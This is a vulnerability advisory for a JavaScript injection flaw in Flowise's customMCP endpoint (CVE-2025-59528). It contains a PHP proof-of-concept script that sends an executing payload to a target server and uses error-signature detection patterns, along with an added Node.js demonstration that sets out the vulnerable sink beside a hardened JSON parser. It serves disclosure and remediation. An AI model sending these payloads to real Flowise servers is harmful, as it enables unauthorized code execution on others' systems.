📄 Flowise 3.0.6 JS Parsing Injection

11 Dec 2025 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Flowise JavaScript parsing injection in the customMCP node-load-method endpoint affects versions >= 2.2.7-patch.1 and < 3.0.6; exploitation is unauthenticated on versions before 3.0.1 and requires authentication from 3.0.1 onward.

=============================================================================================================================================
    | # Title     : Flowise 3.0.6 JS Parsing Injection Vulnerability                                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://flowiseai.com/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528
    
    [+] Summary : 
    
    A JavaScript Parsing Injection vulnerability exists in the following Flowise versions:
    
    Affected: >= 2.2.7-patch.1 and < 3.0.6
    
    Unauthenticated exploitation possible for versions < 3.0.1
    
    Authentication required for versions >= 3.0.1
    
    The vulnerability resides in the endpoint : /api/v1/node-load-method/customMCP
    
    Flowise internally evaluates user input using: Function('return ' + inputString)()
    
    This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.
    
    This report does NOT demonstrate RCE and does NOT execute system commands.
    It focuses strictly on parsing injection as requested.
    
    2. Vulnerability Description
    
    The parameter: inputs.mcpServerConfig
    
    is passed directly to the JavaScript engine via: Function("return " + input)()
    
    The Function constructor compiles the supplied string as a function body, and the trailing () runs it immediately inside the Flowise server process, so the string is executed, not merely parsed. Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:
    
    Attempt to interpret the injected JavaScript
    
    Generate SyntaxError, ReferenceError, or Unexpected token exceptions
    
    Leak internal execution traces
    
    Confirm the backend is evaluating untrusted JS strings
    
    This behavior proves the system is vulnerable to JavaScript parsing injection.
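The following is an added example, not Flowise's own code: a stand-alone Node.js model of the evaluation pattern the advisory quotes, Function('return ' + input)(), placed beside a hardened replacement that accepts only strict JSON with an allow-listed shape. The config keys it permits (command, args, env) are an assumption made for illustration and are not taken from the Flowise source; the sample inputs are constructed, the first of them being this advisory's own PoC payload.

```javascript
// Added example (not Flowise code). Models the evaluation pattern quoted in the
// advisory, Function('return ' + input)(), beside a hardened replacement.
// The config shape accepted by the hardened parser (command/args/env) is an
// assumption made here for illustration, not taken from the Flowise source.

// Vulnerable sink as the advisory describes it: the string is compiled as a
// function body and immediately executed inside the server process.
function unsafeParseConfig(inputString) {
  return Function('return ' + inputString)();
}

// Hardened replacement: strict JSON, bounded size, allow-listed keys and types.
// JSON.parse never runs code, so anything that is not literal JSON fails with a
// SyntaxError before any attacker-controlled expression can execute.
function safeParseConfig(inputString, maxLength = 64 * 1024) {
  if (typeof inputString !== 'string' || inputString.length > maxLength) {
    throw new TypeError('mcpServerConfig must be a string of bounded length');
  }
  const cfg = JSON.parse(inputString);
  if (cfg === null || typeof cfg !== 'object' || Array.isArray(cfg)) {
    throw new TypeError('mcpServerConfig must be a JSON object');
  }
  const allowed = new Set(['command', 'args', 'env']); // assumed shape
  for (const key of Object.keys(cfg)) {
    if (!allowed.has(key)) throw new TypeError(`unexpected key: ${key}`);
  }
  if ('command' in cfg && typeof cfg.command !== 'string') {
    throw new TypeError('command must be a string');
  }
  if ('args' in cfg &&
      !(Array.isArray(cfg.args) && cfg.args.every((a) => typeof a === 'string'))) {
    throw new TypeError('args must be an array of strings');
  }
  if ('env' in cfg &&
      !(cfg.env !== null && typeof cfg.env === 'object' && !Array.isArray(cfg.env) &&
        Object.values(cfg.env).every((v) => typeof v === 'string'))) {
    throw new TypeError('env must map strings to strings');
  }
  return cfg;
}

// Runs a parser over one input and reports either the returned value or the
// name of the exception, so the two sinks can be compared side by side.
function probe(parser, inputString) {
  try {
    return { outcome: 'value', value: parser(inputString) };
  } catch (e) {
    return { outcome: e.constructor.name, message: e.message };
  }
}

// Constructed inputs. pocPayload is the payload from this advisory's PoC.
const SAMPLES = {
  pocPayload: '{x:(function(){ invalid_code_here++ })()}',
  brokenSyntax: '{x: }',
  // Valid JS object literal but not JSON: only the unsafe sink accepts it.
  jsNotJson: '{command: "npx"}',
  // Runs without throwing and leaves a marker on the global object: an
  // error-string detector sees nothing, yet code clearly executed.
  sideEffect: '(globalThis.__mcpProbe = "executed", {})',
  benign: '{"command":"npx","args":["-y","some-mcp-server"]}',
};

// Probes every sample through both sinks and reports whether the unsafe sink
// left the global marker behind.
function runAll() {
  const unsafe = {};
  const safe = {};
  for (const [name, input] of Object.entries(SAMPLES)) {
    unsafe[name] = probe(unsafeParseConfig, input);
    safe[name] = probe(safeParseConfig, input);
  }
  return { unsafe, safe, markerSet: globalThis.__mcpProbe === 'executed' };
}

const results = runAll();
for (const name of Object.keys(SAMPLES)) {
  console.log(`${name.padEnd(13)} unsafe -> ${results.unsafe[name].outcome.padEnd(15)} safe -> ${results.safe[name].outcome}`);
}
console.log(`global marker set by unsafe sink: ${results.markerSet}`);
```

Two things this shows that the advisory's error-based check cannot: the PoC payload is syntactically valid JavaScript and fails with a ReferenceError only at run time, which means it was executed rather than merely parsed; and the sideEffect sample executes without raising anything at all, so a scanner that greps the response for SyntaxError/ReferenceError will report such a target as "not vulnerable". JSON.parse rejects every non-JSON sample before any expression runs, and the allow-list then rejects well-formed JSON that does not match the expected shape.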
    
    3. Impact
    
    Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context.
    
    The confirmed impact here is:
    
    JavaScript parsing injection
    
    Potential denial of service via crafted parsing payloads
    
    Internal error leakage
    
    Strong indicator of further exploitable unsafe evaluation paths
    
    This advisory documents only the safe, non-executing variant.
    
    4. Proof of Concept
    
    <?php
    /**
     * Flowise JS Parsing Injection PoC by indoushka
     * -------------------------------------------------
     * Demonstrates unsafe JavaScript evaluation through controlled parsing failure.
     */
    
    $target = "http://victim-flowise:3000/api/v1/node-load-method/customMCP";
    
    // Payload for the Function('return ' + input)() sink. Note that it is
    // syntactically valid JavaScript: the backend compiles it, then runs the IIFE,
    // which throws a ReferenceError because invalid_code_here is undeclared.
    // The error therefore shows the string was executed, not only parsed.
    $payload = '{x:(function(){ invalid_code_here++ })()}';
    
    $data = [
        "loadMethod" => "listActions",
        "inputs" => [
            "mcpServerConfig" => $payload
        ]
    ];
    
    $options = [
        "http" => [
            // Flowise >= 3.0.1 requires authentication for this endpoint; append
            // the credential header your deployment expects to this string.
            "header"        => "Content-Type: application/json\r\n",
            "method"        => "POST",
            "content"       => json_encode($data),
            "timeout"       => 6,
            // Without this, file_get_contents() returns false on any HTTP error
            // status and the error body we want to inspect is lost.
            "ignore_errors" => true
        ]
    ];
    
    echo "[*] Sending Parsing Injection Payload...\n";
    
    $context = stream_context_create($options);
    $response = @file_get_contents($target, false, $context);
    
    echo "-----------------------------------\n";
    
    if ($response === false) {
        echo "[!] Target did not respond.\n";
        exit(1);
    }
    
    // Detection patterns: error names and stack fragments a JS engine emits when
    // the injected string is compiled or executed. A payload that runs cleanly
    // produces none of these, so a non-match does not prove the sink is absent.
    if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) {
        echo "[+] Vulnerable: JS Parsing Injection confirmed.\n";
        echo "[+] Evidence: Backend attempted to interpret injected JS.\n";
    } else {
        echo "[-] No JS error signature in response (not vulnerable, patched, or error text suppressed).\n";
    }
    
    echo "-----------------------------------\n";
    echo "[*] Raw Response:\n$response\n";
    
    
    Save as : poc.php
    
    run : php poc.php
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Scores (as of 11 Dec 2025)
Vulners AI Score: 7 (High risk)
CVSS 3.1: 10
EPSS: 0.86202